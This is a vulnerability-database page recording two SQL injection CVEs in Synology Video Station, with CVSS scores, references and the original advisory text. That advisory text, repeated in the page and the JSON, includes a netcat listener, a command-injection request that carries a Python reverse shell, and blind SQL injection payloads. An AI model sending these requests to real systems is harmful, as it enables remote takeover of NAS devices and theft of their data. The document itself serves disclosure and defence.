POST /webapi/VideoStation/audiotrack.cgi HTTP/1.1 Content-Length: 294 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-SYNO-TOKEN: 7IKJdJMa8cutE Host: :5000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 User-Agent: Mozilla/5.0 Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Connection: close Pragma: no-cache Cache-Control: no-cache X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: stay_login=0; id=7IivlxDM9MFb213A0LTN001710
id=1%20AND%20%28SELECT%20%28CASE%20WHEN%20%28%28SELECT%20usesuper%3Dtrue%20FROM%20pg_user%20WHERE%20usename%3DCURRENT_USER%20OFFSET%200%20LIMIT%201%29%29%20THEN%20%28CHR%2849%29%29%20ELSE%20%28CHR%2848%29%29%20END%29%29%3D%28CHR%2849%29%29&api=SYNO.VideoStation.AudioTrack&method=list&version=1
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201509-0203",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "video station",
"scope": "lte",
"trust": 1.0,
"vendor": "synology",
"version": "1.5-0757"
},
{
"model": "video station",
"scope": "lt",
"trust": 0.8,
"vendor": "synology",
"version": "1.5-0763"
},
{
"model": "video station",
"scope": "eq",
"trust": 0.6,
"vendor": "synology",
"version": "1.5-0757"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-151"
},
{
"db": "NVD",
"id": "CVE-2015-6911"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:synology:video_station",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Securify B.V., Han Sahin",
"sources": [
{
"db": "PACKETSTORM",
"id": "133519"
}
],
"trust": 0.1
},
"cve": "CVE-2015-6911",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2015-6911",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-84872",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-6911",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2015-6911",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201509-151",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-84872",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2015-6911",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84872"
},
{
"db": "VULMON",
"id": "CVE-2015-6911"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-151"
},
{
"db": "NVD",
"id": "CVE-2015-6911"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection vulnerability in Synology Video Station before 1.5-0763 allows remote attackers to execute arbitrary SQL commands via the id parameter to watchstatus.cgi. Synology Video Station is a video manager from Synology. As a result it is possible to compromise\nthe PostgreSQL database server. \n\n------------------------------------------------------------------------\nAffected versions\n------------------------------------------------------------------------\nThese issues affect Synology Video Station version up to and including\nversion 1.5-0757. The script subtitle.cgi can also be called when the \u0027public share\u0027 option is enabled. With this option enabled, this issue can also be exploited by an unauthenticated remote attacker. This vulnerability can be used to compromise a Synology DiskStation NAS, including all data stored on the NAS, and the NAS as stepping stone to attack other systems. \n\n\n- Start netcat on attacker\u0027s system:\n\nnc -nvlp 80\n\n- Submit the following request (change the IP - 192.168.1.20 - \u0026 port number - 80):\n\nGET /webapi/VideoStation/subtitle.cgi?id=193\u0026api=SYNO.VideoStation.Subtitle\u0026method=get\u0026version=2\u0026subtitle_id=%2Fvolume1%2Fvideo%2Fmr.robot.s01e10.720p.hdtv.x264-killers.nfo%2FMr.Robot.S01E10.720p.HDTV.x264-KILLERS.2aafa5c.eng.srt\u0026subtitle_codepage=auto%26python%20-c%20\u0027import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.20%22,80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5b%22/bin/sh%22,%22-i%22%5d);\u0027%26\u0026preview=false\u0026sharing_id=kSiNy0Pp HTTP/1.1\nHost: 192.168.1.13:5000\nUser-Agent: Mozilla/5.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\n\n\n\nSQL injection vulnerability in watchstatus.cgi\n\nA (blind) SQL injection vulnerability exists in the watchstatus.cgi CGI script. As a result it is possible to compromise the PostgreSQL database server. In the following screenshot this issue is exploited using sqlmap. \n\nProof of concept\n\nPOST /webapi/VideoStation/watchstatus.cgi HTTP/1.1\nHost: 192.168.1.13:5000\nUser-Agent: Mozilla/5.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-SYNO-TOKEN: Lq6mE9ANV2egU\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nContent-Length: 80\nCookie: stay_login=0; id=Lq5QWGqg7Rnzc13A0LTN001710; jwplayer.volume=50\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\n \nid=15076178770%20or%204864%3d4864--%20\u0026position=10.05\u0026api=SYNO.VideoStation.WatchStatus\u0026method=setinfo\u0026version=1\n\nIt should be noted that the X-SYNO-TOKEN header provides protection against Cross-Site Request Forgery attacks. As of DSM version 5.2-5592 Update 3, this protection is enabled by default. As a result it is possible to compromise the PostgreSQL database server. \nProof of concept\n\nPOST /webapi/VideoStation/audiotrack.cgi HTTP/1.1\nContent-Length: 294\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-SYNO-TOKEN: 7IKJdJMa8cutE\nHost: \u003chostname\u003e:5000\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nUser-Agent: Mozilla/5.0\nAccept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7\nConnection: close\nPragma: no-cache\nCache-Control: no-cache\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: stay_login=0; id=7IivlxDM9MFb213A0LTN001710\n \nid=1%20AND%20%28SELECT%20%28CASE%20WHEN%20%28%28SELECT%20usesuper%3Dtrue%20FROM%20pg_user%20WHERE%20usename%3DCURRENT_USER%20OFFSET%200%20LIMIT%201%29%29%20THEN%20%28CHR%2849%29%29%20ELSE%20%28CHR%2848%29%29%20END%29%29%3D%28CHR%2849%29%29\u0026api=SYNO.VideoStation.AudioTrack\u0026method=list\u0026version=1\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-6911"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
},
{
"db": "VULHUB",
"id": "VHN-84872"
},
{
"db": "VULMON",
"id": "CVE-2015-6911"
},
{
"db": "PACKETSTORM",
"id": "133519"
}
],
"trust": 1.89
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-84872",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=38128",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84872"
},
{
"db": "VULMON",
"id": "CVE-2015-6911"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-6911",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "133519",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004688",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201509-151",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "38128",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-84872",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2015-6911",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84872"
},
{
"db": "VULMON",
"id": "CVE-2015-6911"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
},
{
"db": "PACKETSTORM",
"id": "133519"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-151"
},
{
"db": "NVD",
"id": "CVE-2015-6911"
}
]
},
"id": "VAR-201509-0203",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-84872"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-13T23:18:04.121000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Release Notes for Video Station",
"trust": 0.8,
"url": "https://www.synology.com/en-global/releaseNote/VideoStation?model=DS715"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84872"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
},
{
"db": "NVD",
"id": "CVE-2015-6911"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.synology.com/en-global/releasenote/videostation?model=ds715"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2015/sep/31"
},
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/133519/synology-video-station-1.5-0757-command-injection-sql-injection.html"
},
{
"trust": 1.8,
"url": "https://www.securify.nl/advisory/sfy20150810/synology_video_station_command_injection_and_multiple_sql_injection_vulnerabilities.html"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/archive/1/536427/100/0/threaded"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-6911"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-6911"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/536427/100/0/threaded"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/89.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/38128/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84872"
},
{
"db": "VULMON",
"id": "CVE-2015-6911"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-151"
},
{
"db": "NVD",
"id": "CVE-2015-6911"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-84872"
},
{
"db": "VULMON",
"id": "CVE-2015-6911"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
},
{
"db": "PACKETSTORM",
"id": "133519"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-151"
},
{
"db": "NVD",
"id": "CVE-2015-6911"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-09-11T00:00:00",
"db": "VULHUB",
"id": "VHN-84872"
},
{
"date": "2015-09-11T00:00:00",
"db": "VULMON",
"id": "CVE-2015-6911"
},
{
"date": "2015-09-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-004688"
},
{
"date": "2015-09-10T00:05:25",
"db": "PACKETSTORM",
"id": "133519"
},
{
"date": "2015-09-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201509-151"
},
{
"date": "2015-09-11T16:59:17.533000",
"db": "NVD",
"id": "CVE-2015-6911"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-84872"
},
{
"date": "2018-10-09T00:00:00",
"db": "VULMON",
"id": "CVE-2015-6911"
},
{
"date": "2015-09-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-004688"
},
{
"date": "2015-09-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201509-151"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2015-6911"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "133519"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-151"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Synology Video Station In SQL Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "sql injection",
"sources": [
{
"db": "PACKETSTORM",
"id": "133519"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-151"
}
],
"trust": 0.7
}
}
VAR-201509-0202
Vulnerability from variot - Updated: 2025-04-13 23:18SQL injection vulnerability in Synology Video Station before 1.5-0757 allows remote attackers to execute arbitrary SQL commands via the id parameter to audiotrack.cgi. Synology Video Station is a video manager from Synology. As a result it is possible to compromise the PostgreSQL database server.
Affected versions
These issues affect Synology Video Station version up to and including version 1.5-0757. The script subtitle.cgi can also be called when the 'public share' option is enabled. With this option enabled, this issue can also be exploited by an unauthenticated remote attacker. This vulnerability can be used to compromise a Synology DiskStation NAS, including all data stored on the NAS, and the NAS as stepping stone to attack other systems.
- Start netcat on attacker's system:
nc -nvlp 80
- Submit the following request (change the IP - 192.168.1.20 - & port number - 80):
GET /webapi/VideoStation/subtitle.cgi?id=193&api=SYNO.VideoStation.Subtitle&method=get&version=2&subtitle_id=%2Fvolume1%2Fvideo%2Fmr.robot.s01e10.720p.hdtv.x264-killers.nfo%2FMr.Robot.S01E10.720p.HDTV.x264-KILLERS.2aafa5c.eng.srt&subtitle_codepage=auto%26python%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.20%22,80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5b%22/bin/sh%22,%22-i%22%5d);'%26&preview=false&sharing_id=kSiNy0Pp HTTP/1.1 Host: 192.168.1.13:5000 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
SQL injection vulnerability in watchstatus.cgi
A (blind) SQL injection vulnerability exists in the watchstatus.cgi CGI script. As a result it is possible to compromise the PostgreSQL database server. In the following screenshot this issue is exploited using sqlmap.
Proof of concept
POST /webapi/VideoStation/watchstatus.cgi HTTP/1.1 Host: 192.168.1.13:5000 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-SYNO-TOKEN: Lq6mE9ANV2egU X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 80 Cookie: stay_login=0; id=Lq5QWGqg7Rnzc13A0LTN001710; jwplayer.volume=50 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
id=15076178770%20or%204864%3d4864--%20&position=10.05&api=SYNO.VideoStation.WatchStatus&method=setinfo&version=1
It should be noted that the X-SYNO-TOKEN header provides protection against Cross-Site Request Forgery attacks. As of DSM version 5.2-5592 Update 3, this protection is enabled by default. As a result it is possible to compromise the PostgreSQL database server. Proof of concept
POST /webapi/VideoStation/audiotrack.cgi HTTP/1.1 Content-Length: 294 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-SYNO-TOKEN: 7IKJdJMa8cutE Host: :5000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 User-Agent: Mozilla/5.0 Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Connection: close Pragma: no-cache Cache-Control: no-cache X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: stay_login=0; id=7IivlxDM9MFb213A0LTN001710
id=1%20AND%20%28SELECT%20%28CASE%20WHEN%20%28%28SELECT%20usesuper%3Dtrue%20FROM%20pg_user%20WHERE%20usename%3DCURRENT_USER%20OFFSET%200%20LIMIT%201%29%29%20THEN%20%28CHR%2849%29%29%20ELSE%20%28CHR%2848%29%29%20END%29%29%3D%28CHR%2849%29%29&api=SYNO.VideoStation.AudioTrack&method=list&version=1
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201509-0202",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "video station",
"scope": "lte",
"trust": 1.0,
"vendor": "synology",
"version": "1.5-0754"
},
{
"model": "video station",
"scope": "lt",
"trust": 0.8,
"vendor": "synology",
"version": "1.5-0757"
},
{
"model": "video station",
"scope": "eq",
"trust": 0.6,
"vendor": "synology",
"version": "1.5-0754"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004687"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-150"
},
{
"db": "NVD",
"id": "CVE-2015-6910"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:synology:video_station",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004687"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Securify B.V., Han Sahin",
"sources": [
{
"db": "PACKETSTORM",
"id": "133519"
}
],
"trust": 0.1
},
"cve": "CVE-2015-6910",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2015-6910",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-84871",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-6910",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2015-6910",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201509-150",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-84871",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84871"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004687"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-150"
},
{
"db": "NVD",
"id": "CVE-2015-6910"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection vulnerability in Synology Video Station before 1.5-0757 allows remote attackers to execute arbitrary SQL commands via the id parameter to audiotrack.cgi. Synology Video Station is a video manager from Synology. As a result it is possible to compromise\nthe PostgreSQL database server. \n\n------------------------------------------------------------------------\nAffected versions\n------------------------------------------------------------------------\nThese issues affect Synology Video Station version up to and including\nversion 1.5-0757. The script subtitle.cgi can also be called when the \u0027public share\u0027 option is enabled. With this option enabled, this issue can also be exploited by an unauthenticated remote attacker. This vulnerability can be used to compromise a Synology DiskStation NAS, including all data stored on the NAS, and the NAS as stepping stone to attack other systems. \n\n\n- Start netcat on attacker\u0027s system:\n\nnc -nvlp 80\n\n- Submit the following request (change the IP - 192.168.1.20 - \u0026 port number - 80):\n\nGET /webapi/VideoStation/subtitle.cgi?id=193\u0026api=SYNO.VideoStation.Subtitle\u0026method=get\u0026version=2\u0026subtitle_id=%2Fvolume1%2Fvideo%2Fmr.robot.s01e10.720p.hdtv.x264-killers.nfo%2FMr.Robot.S01E10.720p.HDTV.x264-KILLERS.2aafa5c.eng.srt\u0026subtitle_codepage=auto%26python%20-c%20\u0027import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.20%22,80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5b%22/bin/sh%22,%22-i%22%5d);\u0027%26\u0026preview=false\u0026sharing_id=kSiNy0Pp HTTP/1.1\nHost: 192.168.1.13:5000\nUser-Agent: 